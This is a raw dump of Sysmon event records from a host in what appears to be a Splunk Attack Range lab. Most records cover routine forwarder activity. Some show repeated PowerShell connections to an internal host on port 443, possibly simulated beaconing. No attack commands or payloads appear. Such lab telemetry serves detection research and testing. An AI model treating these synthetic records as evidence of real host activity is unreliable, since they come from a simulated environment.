354300x800000000000000035086327Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:34.591{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56835-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035086326Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:09.580{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=942123578EC59A97ABE5D0FC56E8C8C4,SHA256=37EEC7DF11B8F557983752817E85A684CAD3A264C6C23E05C17C903C3A1C9E9A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086329Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:10.916{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=914BFFCA07C67AF4D89488C3DC4EE51A,SHA256=CE5B28A6AC7393CCE248034CFEDA0AFA9E0F5474799A2B2DAAB2242D73F7B85D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086330Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:11.937{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F533DBFC2DF2E94463A80E3B98D74E1B,SHA256=5A4765048813BB255AEF41535BCC7E5A9D323AB3DE7137DF3E07E2B406639BEB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086332Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:12.951{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6E678CD4ACF123CAFDA01050CB170397,SHA256=B9A41C2DD8A1AD9CEC14F41BC6DDA921132E3B3B032D6AF0FC7EB6D7CCFD6368,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035086331Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:37.157{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56836-false10.0.1.12-8000- 23542300x800000000000000035086350Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:13.966{B81B27B7-4024-611D-7300-00000000C801}2188NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=49FD529CC9842323A93D76A7D0157861,SHA256=7B248A2D262E42B2138204C542121ECB4BB0F59FA24B7052F018F89E33F76EDC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035086349Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:13.682{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-5021-613A-8890-03000000C801}1044C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086348Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:13.682{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086347Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:19:13.682{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086346Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:13.682{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086345Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:19:13.682{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086344Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:13.682{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-5021-613A-8890-03000000C801}1044C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035086343Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:13.682{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-5021-613A-8890-03000000C801}1044C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035086342Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:13.667{B81B27B7-5021-613A-8890-03000000C801}1044C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000035086341Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:13.220{B81B27B7-5020-613A-8790-03000000C801}29683908C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086340Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:13.004{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-5020-613A-8790-03000000C801}2968C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086339Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:13.003{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086338Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:19:13.002{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086337Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:13.002{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086336Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:19:13.002{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086335Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:13.002{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-5020-613A-8790-03000000C801}2968C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035086334Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:13.001{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-5020-613A-8790-03000000C801}2968C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035086333Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:12.983{B81B27B7-5020-613A-8790-03000000C801}2968C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035086353Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:14.982{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A0149D37D8B6171E6016B7D5169957A,SHA256=EB2BD560901A490864DB0C10ED77F7348B2C423B4EE8C60DD3887296823F0C97,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
23542300x800000000000000035086352Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:14.004{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=367A0C9140F2AB753EBAAE89DD4E8ADC,SHA256=7E733C063BE1F972B0067AAA0AACB29EEC53D6606E2A97DBE3A4AB5184CED493,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086351Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:14.004{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0A5F478AF0B364C418DB37F5641CABE0,SHA256=EC481498E2C204B2B7C3D9F82F36B7E4AE1BD8BCFC94170467A7ADF16A9D57BE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035086355Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:40.592{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56837-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035086354Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:15.801{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=D021E4A37169206942D4E7F9D2F83708,SHA256=D398A2DB2DBBC2EBB849119ABA6C3296FED0B5E4AACB0F07099463BC41215E49,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
23542300x800000000000000035086356Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:16.019{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=87773B303BB357FC2FC0D79ECDA702EA,SHA256=E4E73C9771FBE4882918A3459FD41564ABC89DD433CA2694393DD9EECF16876D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086357Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:17.050{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=201C94E63A2E048B5641276DDEE36F0E,SHA256=A7AA10D9476481C334CE2296375CBE47D405701BE801E6505BE75F7586DC555F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086358Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:18.080{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C529976522F148EEBFB11A87AC02BA66,SHA256=C6E2E0413EB16B19552FBB3880ED93649E9B2ED7FE9A2747E65133ED458C5C2A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086361Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:19.797{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=F1E0F94F342E9CB27BA48C8945C57B9D,SHA256=0AE83B759B25CCD48B4F6BF1B7B9D82E8D71AEDBD2B07B62BF85874A8923216B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086360Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:19.098{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=52F93BA6B29F70D2D5541CF4F6D982E7,SHA256=2F25CFAF538C9EB26809AA4D0677AF6074DE5CB23CCC47C8A114E462899CEEF4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035086359Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:42.275{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56838-false10.0.1.12-8000- 23542300x800000000000000035086362Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:20.116{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BCF51C934621443DD389E2D75F1D026B,SHA256=0F1BACFBA70BA6B4FF85B24B4CFA27C0291BC3575EB9A2F5A68C762EA20215B4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086364Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:21.146{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A2AE9925AEB3CF6BD1D4D1589A31064,SHA256=5DDA01ABBDAC9A68441567BF88C6F7EE5B404F8F26985703D54D9175911117D8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035086363Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:44.605{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56839-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035086365Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:22.176{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program 